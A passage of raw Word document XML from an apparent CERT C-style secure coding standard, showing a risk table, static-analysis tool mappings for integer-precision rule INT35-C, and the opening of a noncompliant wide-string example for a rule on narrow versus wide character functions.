              <w:t xml:space="preserve"> – Assumptions with input data can lead to errors. This </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00E92B40">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>principle</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="007E1C77">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> ties in as the focus is on using less assumptions with data h</w:t>
            </w:r>
            <w:r w:rsidR="00C159E4">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>andling, and in this case integer precision.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F21822" w14:paraId="43192141" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D640FC1" w14:textId="5A60663F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72BD1BCD" w14:textId="542067C1" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE08C9E" w14:textId="7E03DEB9" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="507F810F" w14:textId="740D7CB7" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>P2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4686F95C" w14:textId="0CA24A1F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">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21822" w14:paraId="21DC6877" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="486E9681" w14:textId="4361E0CE" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId53" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5590A5CF" w14:textId="404CA522" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>20.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2935D2F6" w14:textId="5767E80F" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EAFC44" w14:textId="1F90FE3E" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t xml:space="preserve">Supported: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F21822">
              <w:t>Astrée</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F21822">
              <w:t xml:space="preserve"> reports overflows due to insufficient precision.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="64F0AC3A" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA053B5" w14:textId="0E042FB1" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId54" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7249D211" w14:textId="77777777" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822"/>
          <w:p w14:paraId="64B7FC40" w14:textId="150CD76E" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="366A2660" w14:textId="77777777" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>C0582</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0155179E" w14:textId="214F003A" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>C++3115</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3877BF3F" w14:textId="6EC87241" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="2E5EE7DD" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="000C184C" w14:textId="58308CDC" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId55" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B0CCC4F" w14:textId="55231769" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>2021.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6506F573" w14:textId="1E48CD8E" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>CERT_C-INT35-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="570322E7" w14:textId="7D1125A0" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t xml:space="preserve">Use correct integer precisions when checking the </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F21822">
              <w:t>right hand</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F21822">
              <w:t xml:space="preserve"> operand of the shift operator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F21822" w14:paraId="2EE1B702" w14:textId="77777777" w:rsidTr="00F51FA8">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09F1CB00" w14:textId="6976F254" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId56" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C057DF1" w14:textId="69CC26C9" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>R2021a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19BD5035" w14:textId="008F7977" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:hyperlink r:id="rId57" w:history="1">
              <w:r w:rsidRPr="00F21822">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>CERT C: Rule INT35-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EBAC9F0" w14:textId="212DFD25" w:rsidR="00F21822" w:rsidRPr="00F21822" w:rsidRDefault="00F21822" w:rsidP="00F21822">
            <w:r w:rsidRPr="00F21822">
              <w:t>Checks for situations when integer precisions are exceeded (rule fully covered)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2B6BDC5" w:rsidR="00381847" w:rsidRDefault="00DA3CCE">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA3CCE">
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Do not confuse narrow and wide character strings and functions</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04A023F2" w:rsidR="00381847" w:rsidRDefault="00BE6AD2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Buffer Overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="72961103" w14:textId="446D8D47" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00DA3CCE">
              <w:t>STR</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00DA3CCE">
              <w:t>038</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00DA3CCE">
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:t>]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7632" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="02179BF3" w14:textId="29CF05D9" w:rsidR="00381847" w:rsidRDefault="00BE6AD2">
            <w:r>
              <w:t>Passing narrow to wide or wide to narrow string functions can lead to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997BE99" w:rsidR="00F72634" w:rsidRDefault="00BE6AD2" w:rsidP="0015146B">
            <w:r>
              <w:t xml:space="preserve">Using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strnpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>() function attempts to copy up to 10 wide characters. Since the wide characters can contain null byes, the copy operation may end earlier than anticipated, and the result is a truncation of the wide string.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="23207A43" w14:textId="77777777" w:rsidTr="0015146B">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4FB896F0" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>stddef.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77836640" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>string.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06F6A921" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC2FE7A" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>func</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(void) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A95D98" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>wchar_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>wide_str1[]  = L"0123456789</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="1A7870CE" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>wchar_t</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>wide_str2[] =  L"0000000000</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="198C477C" w14:textId="77777777" w:rsidR="00BE6AD2" w:rsidRPr="00BE6AD2" w:rsidRDefault="00BE6AD2" w:rsidP="00BE6AD2">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE6AD2">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
